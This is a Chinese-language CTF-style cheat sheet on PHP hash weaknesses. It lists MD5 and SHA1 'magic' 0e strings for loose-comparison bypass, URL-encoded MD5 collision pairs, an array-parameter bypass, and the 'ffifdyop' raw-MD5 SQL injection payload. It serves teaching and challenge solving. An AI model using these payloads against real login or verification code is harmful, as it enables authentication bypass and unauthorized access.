MD5、HASH相关漏洞
MD5弱比较
<?php
if(md5($_GET['a']) == md5($_GET['b'])){
echo $flag;
}
?>
输入两个值,然后对比两个值的MD5值,如果相等,则输出flag。
典型的弱类型比较,符合两个条件:
- MD5计算后结果开头是0e 0e开头是让PHP把这段字符串认为是科学记数法字符串的先决条件
- 0e后面全是数字。例如,0e123==0e234,0的N次方始终是0
满足以上两个条件的字符串有:
- QNKCDZO
- 240610708
- s155964671a
- s878926199a
- s214587387a
- s1885207154a
- s1836677006a
md5(md5())后开头是0e的字符串:
- CbDLytmyGm2xQyaLNhWn
- 770hQgrBOjrcqftrlaZk
- 7r4lGXCH2Ksu2JNT3BYM
CbDLytmyGm2xQyaLNhWn
md5(CbDLytmyGm2xQyaLNhWn) => 0ec20b7c66cafbcc7d8e8481f0653d18
md5(md5(CbDLytmyGm2xQyaLNhWn)) => 0e3a5f2a80db371d4610b8f940d296af
770hQgrBOjrcqftrlaZk
md5(770hQgrBOjrcqftrlaZk) => 0e689b4f703bdc753be7e27b45cb3625
md5(md5(770hQgrBOjrcqftrlaZk)) => 0e2756da68ef740fd8f5a5c26cc45064
7r4lGXCH2Ksu2JNT3BYM
md5(7r4lGXCH2Ksu2JNT3BYM) => 0e269ab12da27d79a6626d91f34ae849
md5(md5(7r4lGXCH2Ksu2JNT3BYM)) => 0e48d320b2a97ab295f5c4694759889f
MD5相同的二进制数据
注意URL编码
md5(param1) === md5(param2)
param1=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
param2=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
MD4
MD4也满足这两个条件的字符串:
- 0e251288019
SHA1
SHA1也满足这两个条件的字符串:
- aa3OFF9m
- aaO8zKZF
- aaroZmOk
- aaK1STfY
MD5数组绕过
MD5不能处理数组,若有以下判断则可用数组绕过
if(md5($_GET['a']) === md5($_GET['b']))
{
echo "yes";
}
//http://127.0.0.1/1.php?a[]=1&b[]=2
sql注入MD5
ffifdyop
select * from 'admin' where password =md5($pass,ture)
$pass = ffifdyop
ffifdyop md5加密后形成’or’6XXXXXXXXX’(这里的XXXXX是一些乱码和不可见字符) md5值为: ’or’6\xc9]\x99\xe9!r,\xf9\xedb\x1c 这里的SQL语句会变成
select * from `admin` where password=''or'6XXXXXXXXX'
形成sql注入